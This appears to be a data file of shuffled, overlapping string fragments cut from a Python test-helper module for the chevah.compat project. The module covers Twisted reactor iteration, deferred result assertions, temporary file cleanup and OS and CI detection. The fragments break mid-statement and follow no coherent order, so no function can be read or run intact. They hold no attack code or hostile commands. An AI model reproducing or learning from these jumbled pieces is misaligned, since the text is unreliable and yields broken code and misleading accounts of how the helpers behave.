https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\"", "self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0:", "more delayed calls, readers or writers or threads are in", "NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns `osx` followed", "the separate unittest2 module. # It comes by default in", "= checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred( deferred,", "On non-Linux this is just the os_name. On Linux is", "= False reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\"", "that no temporary files or folders are present. \"\"\" #", "end of a stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop()", "usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if callback is None:", "= None # We search starting with second stack, since", "wait for a deferred to have a result. DEFERRED_TIMEOUT =", "the fixtures/cleanup # code which is executed from another thread.", "as # required to wait for them when running the", "and the last callback or errback returned a non-L{failure.Failure}. @type", "its callback chain and the last callback or errback raised", "isinstance(deferred.result, Failure): error = deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains", "the major and minor NT version. It is not the", "if have_callbacks: continue if run_once: if have_callbacks: raise AssertionError( 'Reactor", "if reactor is None: return def raise_failure(location, reason): raise AssertionError(", "make sure we don't compare str with unicode. \"\"\" if", "super(FileSystemTestCase, self).setUp() # Initialized only to clean the home folder.", "return [] else: return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove", "mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\"", "self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self, first, second, msg): super(ChevahTestCase,", "`duration` seconds.. \"\"\" start = time.time() self.executeReactorUntil( lambda _: time.time()", "in the deferred deferred.addErrback(lambda _: None) self.fail( \"No result expected", "deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result def assertWasCalled(self,", "os.environ['USER'] = cls._drop_user # Test suite should be started as", "self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor until", "count=1, timeout=None, debug=False): \"\"\" Iterate the reactor and stop it", "or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks = True continue", "prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the reactor", "= raw_name.replace('<bound method ', '') return raw_name.split(' ', 1)[0] def", "test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests that need", "# noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted =", "raise C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a failure", "% ( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None, *args,", "for exception in self.excepted_threads: if name in exception: return True", "\"\"\" Return the CPU type as used in the brink.sh", "not reactor.threadpool: return [] else: return reactor.threadpool.working @classmethod def _cleanReactor(cls):", "have persistent deferred which will be removed only at the", "In case we are running the test suite as super", "is self._reactor_timeout_call: continue if not delayed.func: # Was already called.", "more than %d to execute.' % timeout) # Check executing", "test is done. \"\"\" for exception in self.excepted_threads: if name", "it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args, **kwargs)", "value = value, expected_type if not isinstance(value, expected_type): raise AssertionError(", "super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure = None @property def", "expected_type, type(value), msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return (path,", "from chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem import LocalTestFilesystem", "type (%s) expected on %r, \" \"found type %r instead:", "not being handled. \"\"\" deferred.addErrback(lambda failure: None) def assertIsFailure(self, deferred):", "raw_name = raw_name.replace('<function ', '') raw_name = raw_name.replace('<bound method ',", "reactor queue. \"\"\" result = [] for delayed in reactor.getDelayedCalls():", "stops the reactor. This will do recursive calls, in case", "'Reactor queue still contains delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break", "delay the import as it will call lsb_release. import ld", "on it and it has reached the end of its", "in the brink.sh script. \"\"\" base = platform.processor() if base", "to find \"success\" attribute.') return success def tearDown(self): try: if", "\"\"\" Return a string representation of all delayed calls from", "not inspect.isclass(expected_type): expected_type, value = value, expected_type if not isinstance(value,", "if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks", "failure result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called", "twisted.internet import reactor except ImportError: reactor = None def _get_hostname():", "mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path, segments) def tempFolder(self, name=None,", "raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted = False for", "This is useful if you have persistent deferred which will", "and member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member) segments = folder_segments[:] segments.append(member)", "on #: teardown. CREATE_TEST_USER = None @classmethod def setUpTestUser(cls): \"\"\"", "L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" # FIXME:1370: # Remove /", "break # No need to look for other things as", "self._iterateTestReactor(debug=debug) have_callbacks = False # Check for active jobs in", "re-route this code after upgrading to Twisted 13 result =", "isinstance(reader, excepted_reader): have_callbacks = False break if have_callbacks: break if", "\"\"\" Check that deferred was called. \"\"\" if not deferred.called:", "the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it returns", "Look at threads queue. if len(reactor.threadCallQueue) > 0: raise_failure('queued threads',", "distro_name == 'arch': # Arch has no version. return 'arch'", "mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if", "# Everything fine, disable timeout. if ( self._reactor_timeout_call and not", "BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the name", "patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\" Helper for patching", "or has an unexpected failure result. @return: The failure result", "not spin the reactor. # To not slow down all", "environment. \"\"\" cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME'", "ImportError: reactor = None def _get_hostname(): \"\"\" Return hostname as", "from twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure", "at the end of test. Only use this for very", "from another thread. # removeAll might fail since it detects", "success = inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None if", "execution, raises error in timeout, stops the reactor. This will", "return process_capabilities.os_name # We delay the import as it will", "in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There", "supported.') def folderInTemp(self, *args, **kwargs): \"\"\" Create a folder in", "to execute the stop code. reactor.iterate() # Set flag to", "the test case and removed on #: teardown. CREATE_TEST_USER =", "flood the output. print ( u'delayed: %s\\n' u'threads: %s\\n' u'writers:", "test will fail as they # will not spin the", "- start > duration, timeout=duration + 0.1, debug=debug, prevent_stop=False, )", "if os.name == 'nt': parts = platform.version().split('.') return 'nt-%s.%s' %", "for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def", "to ignore during the tearDown. # No need for the", "# arguments. if not inspect.isclass(expected_type): expected_type, value = value, expected_type", "query = ( u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE", "elif isinstance(result[0], Failure): self.fail( \"Success result expected on %r, \"", "or errback returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException:", "name of the CI on which the tests are currently", "stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self):", "AlreadyCancelled and AlreadyCalled are ValueError. # Might be canceled from", "only called when we run with -v or we show", "u'threadpool size: %s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n'", "def _get_os_version(): \"\"\" On non-Linux this is just the os_name.", "deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a result. This means that neither", "SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success' member from the", "search starting with second stack, since first stack is the", "Clean all test files from folder_segments. Return a list of", "if only_marked and member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member) segments =", "base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines',", "upgrading to Twisted 13 result = [] def cb(res): result.append(res)", "if os_name == 'darwin': parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' %", "= mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path, segments) def tempFolder(self,", "'osx-%s.%s' % (parts[0], parts[1]) if os_name == 'sunos': parts =", "super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type) for first_element, second_element in", "\"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return", "= True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run", "to Twisted 13.0. result = [] deferred.addBoth(result.append) if not result:", "self._raiseReactorTimeoutError, timeout) # Don't start the reactor if it is", "def executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run reactor until no", "of type (%s) expected on %r, \" \"found type %r", "is a failure. \"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred", "version. It is not the version of the underlying Darwin", "of the types provided, then this test will fail. @raise", "cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True)", "\"\"\" Overwrite unit-test behaviour to run cleanup method before tearDown.", "\"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args,", "all cleanup methods. If a cleanup fails, the next cleanups", "seconds to execute.' % timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self,", "% ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), )", "timeout=duration + 0.1, debug=debug, prevent_stop=False, ) def _getDelayedCallName(self, delayed_call): \"\"\"", "\"Success result expected on %r, \" \"found failure result instead:\\n%s\"", "the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" # FIXME:1370: # Remove", "self.excepted_threads: if name in exception: return True if exception in", "show the error. \"\"\" class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test',", "raise AssertionError( 'Deferred contains a failure: %s' % (error)) def", "thread. # AttributeError can occur when we do multi-threading. pass", "# Set up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout)", "zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self, first, second, msg): super(ChevahTestCase,", "test files from folder_segments. Return a list of members which", "None if errors: raise AssertionError('Cleanup errors: %r' % (errors,)) def", "import threading import os import platform import socket import sys", "path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file =", "try: from twisted.internet.defer import Deferred from twisted.internet.posixbase import ( _SocketWaker,", "0) ): time.sleep(0.01) have_callbacks = True continue # Look at", "self._threadPoolThreads()) if len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for", "def getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" Run the", "the failure. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred", "\"\"\" deferred.addErrback(lambda failure: None) def assertIsFailure(self, deferred): \"\"\" Check that", "class_name = class_name[tests_start:] return \"%s - %s.%s\" % ( self._testMethodName,", "first, second, msg, seq_type) for first_element, second_element in zip(first, second):", "at the end of a stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__", "stack is the # current stack and we don't care", "= self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to True to enter", "def patch(*args, **kwargs): \"\"\" Helper for generic patching. \"\"\" return", "@classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return", "while not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls = reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except", "only for cleanup purpose and should not be used by", "deferred_done = deferred.called if self._timeout_reached: raise AssertionError( 'Deferred took more", "delayed is self._reactor_timeout_call: continue if not delayed.func: # Was already", "we prevent stop in a previous run. if reactor._started: return", "C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a failure result.", "debug=False, prevent_stop=False): \"\"\" This is low level method. In most", "left unchanged. Otherwise, any L{failure.Failure} result is swallowed. @param deferred:", "to run cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs))", "return [] # In case we are running the test", "thread queue, which will never be called. \"\"\" if not", "if cls.os_family == 'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family", "prefix=prefix, suffix=suffix) def tempFile(self, content='', prefix='', suffix='', cleanup=True): \"\"\" Return", "duration, timeout=duration + 0.1, debug=debug, prevent_stop=False, ) def _getDelayedCallName(self, delayed_call):", "'linux': return process_capabilities.os_name # We delay the import as it", "ld.version().split('.', 1)[0] return '%s-%s' % (distro_name, distro_version) def _get_cpu_type(): \"\"\"", "> 0: have_callbacks = True continue for reader in reactor.getReaders():", "result[0] def assertNoResult(self, deferred): \"\"\" Assert that C{deferred} does not", "import os import platform import socket import sys import time", "it. for level in inspect.stack()[1:]: try: success_state = level[0].f_locals['success'] break", "the output. print ( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n'", "of test. Only use this for very high level integration", "SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result, has a success", "cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up OS user for file", "return _get_hostname() @classmethod def initialize(cls, drop_user): \"\"\" Initialize the testing", "thread name excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler',", "from chevah.compat.testing.filesystem import LocalTestFilesystem # For Python below 2.7 we", "useful if you have persistent deferred which will be removed", "self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common", "@classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass()", "temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = [] for member in (temp_filesystem.getFolderContent(folder_segments)):", "have_callbacks = True break # No need to look for", "\"root\" deferred. In most tests you would like to use", "for delayed calls which should not be considered as #", "failure: None) def assertIsFailure(self, deferred): \"\"\" Check that deferred is", "errors='replace'))) else: return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return", "cb(res): result.append(res) return res deferred.addBoth(cb) if result: # If there", "the test. bla.bla.tests. is removed. The format is customized for", "parts[1]) if os_name == 'sunos': parts = platform.release().split('.') return 'solaris-%s'", "Call all cleanup methods. If a cleanup fails, the next", "a deferred.') if timeout is None: timeout = self.DEFERRED_TIMEOUT try:", "in expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected on %r,", "the brink.sh script. \"\"\" base = platform.processor() if base ==", "called when we run with -v or we show the", "\"\"\" This is low level method. In most tests you", "repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise", "created in temp which is auto cleaned. \"\"\" segments =", "home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if", "the reactor during tests. \"\"\" # Number of second to", "do multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal an timeout", "%s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool size: %s\\n'", "yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that no temporary", "_isExceptedThread(self, name): \"\"\" Return `True` if is OK for thread", "return reactor._startedBefore = False reactor._started = False reactor._justStopped = False", "at teardown. \"\"\" if reactor is None: return def raise_failure(location,", "self.addCleanup(mk.fs.deleteFile, segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return", "segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder,", "will # report it, so swallow it in the deferred", "return 'arm64' if base == 'x86_64': return 'x64' return base", "break if not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call", "def _assertReactorIsClean(self): \"\"\" Check that the reactor has no delayed", "self._teardown_errors = self._teardown_errors, None if errors: raise AssertionError('Cleanup errors: %r'", "# noqa:cover \"\"\" The short description for the test. bla.bla.tests.", "Common test case for all file-system tests using a real", "result: self.fail( \"Success result expected on %r, found no result", "Otherwise, any L{failure.Failure} result is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}", "FIXME:924: # Disabled when we can not find the home", "execute the stop code. reactor.iterate() # Set flag to fake", "noqa:cover if not msg: msg = u'First is str while", "tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create a new temp folder", "for cleanup purpose and should not be used by normal", "from bunch import Bunch from mock import patch, Mock from", "2.7 we use the separate unittest2 module. # It comes", "do recursive calls, in case the original deferred returns another", "excepted_reader): have_callbacks = False break if have_callbacks: break if have_callbacks:", "the exception wrapped by the failure result is not one", "\"\"\" os_name = process_capabilities.os_name os_family = process_capabilities.os_family os_version = _get_os_version()", "tests you would like to use one of the `getDeferredFailure`", "+ 7 class_name = class_name[tests_start:] return \"%s - %s.%s\" %", "we use super filesystem for cleaning. if cls._environ_user == cls._drop_user:", "'') return raw_name.split(' ', 1)[0] def getDeferredFailure( self, deferred, timeout=None,", "Check that the reactor has no delayed calls, readers or", "the current failure result of C{deferred} or raise C{self.failException}. @param", "break # Look at writers buffers: if len(reactor.getWriters()) > 0:", "= text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') +", "a small delay in steps, # to have a much", "except ImportError: reactor = None def _get_hostname(): \"\"\" Return hostname", "of at most 1 second. if t2 is None or", "in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values, second_values, msg, list)", "else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors =", "None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) delayed_calls", ") def _getDelayedCallName(self, delayed_call): \"\"\" Return a string representation of", "If the L{Deferred<twisted.internet.defer.Deferred>} has no result or has a failure", "has a failure result. @return: The result of C{deferred}. \"\"\"", "import absolute_import from six import text_type from six.moves import range", "> 0: raise_failure('active threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if pool_queue:", "error = deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a failure:", "have_callbacks: break if have_callbacks: continue # Look at threads queue", "which run in one tread and from the fixtures/cleanup #", "= ( u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d'", "tread and from the fixtures/cleanup # code which is executed", "only if test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase,", "@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a success result. This", "temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def getPeakMemoryUsage(cls):", "self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager for stacked cleanups.", "% (repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None):", "non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if callback is", "\" \"found type %r instead: %s\" % ( expectedString, deferred,", "\"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\" Call all cleanup", "deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred(", "int(peak_working_set_size) else: raise AssertionError('OS not supported.') def folderInTemp(self, *args, **kwargs):", "around the stdlib call to allow non-context usage. \"\"\" super_assertRaises", "check() except AssertionError as error: errors.append(error.message) if errors: # noqa:cover", "delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str", "queue. \"\"\" result = [] for delayed in reactor.getDelayedCalls(): #", "where you don't have the change to get a \"root\"", "test. bla.bla.tests. is removed. The format is customized for Chevah", "on %r, \" \"found success result (%r) instead\" % (deferred,", "= self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break", "Initialize the testing environment. \"\"\" cls._drop_user = drop_user os.environ['DROP_USER'] =", "timeout error while executing the reactor. \"\"\" self._timeout_reached = True", "= text_type(delayed_call.func) raw_name = raw_name.replace('<function ', '') raw_name = raw_name.replace('<bound", "that we need # to wait at least for delayed", "of its callback chain and the last callback or errback", "for stacked cleanups. \"\"\" try: self.enterCleanup() yield finally: self.exitCleanup() def", "folder and mark it for cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup", "self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted = True break if not", "Set run_once=True to only run the reactor once. This is", "the test # case itself which run in one tread", "try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path, segments)", "process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path =", "def _threadPoolWorking(self): \"\"\" Return working thread from pool, or empty", "need a dedicated local OS account present. \"\"\" #: User", "result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def assertNoResult(self, deferred):", "(parts[0], parts[1]) # We are now in Unix zone. os_name", "= reactor.timeout() # For testing we want to force to", "in os.environ and 'USER' not in os.environ: os.environ['USER'] = os.environ['USERNAME']", "resolved by default DNS resolver. \"\"\" return socket.gethostname() class TwistedTestCase(TestCase):", "or errback raised an exception or returned a L{failure.Failure}. @type", "ignore during the tearDown. # No need for the full", "return False def addCleanup(self, function, *args, **kwargs): \"\"\" Overwrite unit-test", "expected on %r, found no result instead\" % ( deferred,))", "\"\"\" if cls.os_family == 'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif", "it before raising the error. self._shutdownTestReactor() raise AssertionError('Reactor was not", "segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile,", "thread from pool, or empty when threadpool does not exists", "chevah.compat.testing.mockup import mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from", "you have persistent deferred which will be removed only at", "= Bunch Mock = Mock #: Obsolete. Please use self.patch", "this method, to avoid propagating the error into the reactor.", "when threadpool does not exists or has no job. \"\"\"", "deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a success result. This means", "'USER' not in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER' in", "mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self, *args, **kwargs): \"\"\" Create a file", "iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, ) def", "reactor, waits for deferred execution, raises error in timeout, stops", "if not deferred.called: raise AssertionError('This deferred was not called yet.')", "\"\"\" The short description for the test. bla.bla.tests. is removed.", "super(ChevahTestCase, self).assertSetEqual(first, second, msg) first_elements = sorted(first) second_elements = sorted(second)", "_get_os_version() cpu_type = process_capabilities.cpu_type ci_name = _get_ci_name() CI = _CI_NAMES", "names to ignore during the tearDown. # No need for", "which will never be called. \"\"\" if not reactor.threadpool: return", "AssertionError('This deferred was not called yet.') def ignoreFailure(self, deferred): \"\"\"", "as error: errors.append(error.message) if errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There are", "% os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099:", "0.1 t = reactor.running and t2 reactor.doIteration(t) else: # FIXME:4428:", "found no result instead\" % ( deferred,)) elif not isinstance(result[0],", "( first,) raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg)", "Provides support for running deferred and start/stop the reactor during", "\"\"\" if reactor is None: return def raise_failure(location, reason): raise", "expected_type if not isinstance(value, expected_type): raise AssertionError( \"Expecting type %s,", "class TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific code. Provides", "all filesystem checks into a specialized class if self.test_segments: if", "by the version. It is not the version of the", "chevah.compat.administration import os_administration from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup import", ") t2 = reactor.timeout() # For testing we want to", "for delayed in reactor.getDelayedCalls(): # We skip our own timeout", "thread_name = thread.getName() if self._isExceptedThread(thread_name): continue self._teardown_errors.append(AssertionError( 'There are still", "AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an exception", "self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2", "def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean all test files from", "True for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks =", "better debug output. # Otherwise the debug messages will flood", "swallow it in the deferred deferred.addErrback(lambda _: None) self.fail( \"No", "in os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in os.environ and", "a stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def", "\"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) return super(ChevahTestCase, self)._baseAssertEqual( first,", "= mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod", "the reactor touched from the test # case itself which", "Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size", "Windows it is the `nt` followed by the major and", "Only use this for very high level integration code, where", "( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) )", "if len(reactor.threadCallQueue) > 0: raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool and", "@property def _caller_success_member(self): '''Retrieve the 'success' member from the test", "in reactor.getDelayedCalls(): try: delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled and", "def assertIsFailure(self, deferred): \"\"\" Check that deferred is a failure.", "first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys())", "break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\" Iterate the", "there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is", "1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False, )", "# report it, so swallow it in the deferred deferred.addErrback(lambda", "#: Obsolete. Please use self.patch and self.patchObject. Patch = patch", "msg=None): \"\"\" Update to stdlib to make sure we don't", "def getPeakMemoryUsage(cls): \"\"\" Return maximum memory usage in kilo bytes.", "only be called at cleanup as it removes elements from", "% ( expected_type, type(value), msg)) def tempPath(self, prefix='', suffix=''): \"\"\"", "L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If", "if sys.version_info[0:2] < (2, 7): from unittest2 import TestCase #", "%s: %s' % (location, reason)) if reactor._started: # noqa:cover #", "deferred. In most tests you would like to use one", "Timeout might be no longer be there. pass if not", "folders left over.\\n %s' % ( '\\n'.join(errors)))) def shortDescription(self): #", "callback(*args, **kwargs) return context.exception def assertSequenceEqual(self, first, second, msg, seq_type):", "protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n',", "(%r) instead\" % (deferred, result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)):", "to swap the arguments. \"\"\" if source not in target:", "is None: raise AssertionError('Failed to find \"success\" attribute.') return success_state", "super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a string representation of", "timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, 